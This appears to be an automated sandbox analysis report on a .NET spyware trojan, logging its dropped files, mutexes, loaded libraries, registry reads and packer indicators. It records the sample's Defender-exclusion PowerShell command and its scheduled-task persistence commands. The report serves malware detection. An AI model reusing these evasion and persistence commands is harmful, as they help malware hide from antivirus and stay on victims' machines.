Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/13@0/1

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Code function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

12_2_0040434D

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe

Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp

Jump to behavior

Source: FVR-N2411-07396.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FVR-N2411-07396.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FVR-N2411-07396.exe

ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File read: C:\Users\user\Desktop\FVR-N2411-07396.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Process created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Process created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: FVR-N2411-07396.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FVR-N2411-07396.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: FVR-N2411-07396.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: yRKC.pdbSHA256z3 source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr
Source:	Binary string: yRKC.pdb source: FVR-N2411-07396.exe, ZeJFfrYmOnJKS.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs	.Net Code: PA78pcebas System.Reflection.Assembly.Load(byte[])
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs	.Net Code: PA78pcebas System.Reflection.Assembly.Load(byte[])
Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, GtaAIbrHXObmMm8GPA.cs	.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, GtaAIbrHXObmMm8GPA.cs	.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR

Source: FVR-N2411-07396.exe

Static PE information: 0xD1D92115 [Fri Jul 25 11:18:45 2081 UTC]

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_0284EFB0 push esp; iretd	0_2_0284EFB1
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_07200CD2 push FFFFFFBBh; ret	0_2_07200CD4
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_00B4EFB0 push esp; iretd	8_2_00B4EFB1
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AD4
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 12_2_00402AC0 push eax; ret	12_2_00402AFC

Source: FVR-N2411-07396.exe	Static PE information: section name: .text entropy: 7.731637245415364
Source: ZeJFfrYmOnJKS.exe.0.dr	Static PE information: section name: .text entropy: 7.731637245415364

Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, kR5Zu6rQZ9pk5Z1T9Y.cs	High entropy of concatenated method names: 'jWGuOxCXC4', 'MhRuvKSXgT', 'DuRupfZ1Ay', 'tA3uhkJfkR', 'EfouS7XS2b', 'UppumaWtFP', 'bbluPFD7kS', 'sgOufq0cT5', 'IUuuTVXudN', 'pyOuimrhI1'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, yoviBaDFVvgmcnwmMa.cs	High entropy of concatenated method names: 'K0n7BoxZV2', 'Wx17LC0bwZ', 'JeK77k2ooD', 'WuJ7kqYBS7', 'wCb7yjedtA', 'ciw7tmU9vI', 'Dispose', 'Dh1nAmq8La', 'f8anHJsUxC', 'Ascn0Y9aWn'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, Tsw2ZcHAjSja6s8HSf.cs	High entropy of concatenated method names: 'Dispose', 'ygmCRcnwmM', 'sr6WwsXyh3', 'dGqWB1boNy', 'NAPCXQI9J4', 'Y2aCzreK42', 'ProcessDialogKey', 'ktpWFF9nXe', 'fnOWCkkXrg', 'SNmWWWWFvx'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, vMlPAnTPODhkqCPJR0.cs	High entropy of concatenated method names: 'MLq0hoy2Ue', 'hl50mwyNHh', 'gPr0fGL45I', 'GGg0TEiHh2', 'IPJ0B6luEl', 'DnR0dtGwtJ', 'VOh0LYHA0T', 'BMg0nXwPdR', 'C1l07tAiUr', 'SUp0KuHjox'
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, BtG9i9CCpdyu6WtoZHM.cs	High entropy of concatenated method names: 'H9FKXil0UO', 'Dn5KzNJYie', 'Fp8kFQCXUa', 'VAFkCw5QQX', 'WeukWTLjTC', 'l1ikoaBy3l', 't0Qk859SCT', 'Aepkgwrj9T', 'M7YkANQEa4', 'qI2kHhGIpU'
